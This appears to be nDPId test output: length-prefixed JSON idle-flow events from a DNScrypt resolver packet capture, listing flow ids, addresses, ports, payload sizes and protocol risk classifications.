+00834{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380805,"flow_last_seen":946739380837,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":56335,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00833{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348805,"flow_last_seen":946739348913,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":59224,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00833{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348805,"flow_last_seen":946739348916,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":57180,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400522,"flow_last_seen":946739400550,"flow_idle_time":180000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":352,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":49568,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00833{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318169,"flow_last_seen":946739318200,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":35885,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00833{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739402188,"flow_last_seen":946739402357,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":34024,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":51509,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312402,"flow_last_seen":946739312464,"flow_idle_time":180000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":42156,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312402,"flow_last_seen":946739312463,"flow_idle_time":180000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":46255,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312132,"flow_last_seen":946739312181,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":45987,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317496,"flow_last_seen":946739317829,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":55267,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396111,"flow_last_seen":946739396216,"flow_idle_time":180000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":352,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":37287,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337048,"flow_last_seen":946739337078,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":38310,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305327,"flow_last_seen":946739305348,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1515,"flow_avg_l4_payload_len":757,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":40009,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00828{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304628,"flow_last_seen":946739304804,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":38136,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312132,"flow_last_seen":946739312178,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":41913,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305349,"flow_last_seen":946739305457,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":60301,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00834{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396047,"flow_last_seen":946739396069,"flow_idle_time":180000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":41108,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348756,"flow_last_seen":946739348800,"flow_idle_time":180000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":38709,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00834{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304363,"flow_last_seen":946739304396,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":44491,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396047,"flow_last_seen":946739396074,"flow_idle_time":180000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":55469,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311153,"flow_last_seen":946739311306,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":43528,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337184,"flow_last_seen":946739337218,"flow_idle_time":180000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":707,"flow_avg_l4_payload_len":353,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":40748,"dst_port":465,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311153,"flow_last_seen":946739311312,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":55822,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396070,"flow_last_seen":946739396109,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":33246,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312132,"flow_last_seen":946739312179,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":46063,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312132,"flow_last_seen":946739312180,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":37890,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317462,"flow_last_seen":946739317496,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":58740,"dst_port":2053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00828{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312106,"flow_last_seen":946739312136,"flow_idle_time":180000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":701,"flow_avg_l4_payload_len":350,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":60735,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311153,"flow_last_seen":946739311313,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":51770,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305155,"flow_last_seen":946739305189,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":47341,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396070,"flow_last_seen":946739396107,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":33293,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400522,"flow_last_seen":946739400551,"flow_idle_time":180000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":352,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":49732,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312105,"flow_last_seen":946739312132,"flow_idle_time":180000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1661,"flow_avg_l4_payload_len":830,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":56688,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739402188,"flow_last_seen":946739402356,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":60852,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":53299,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
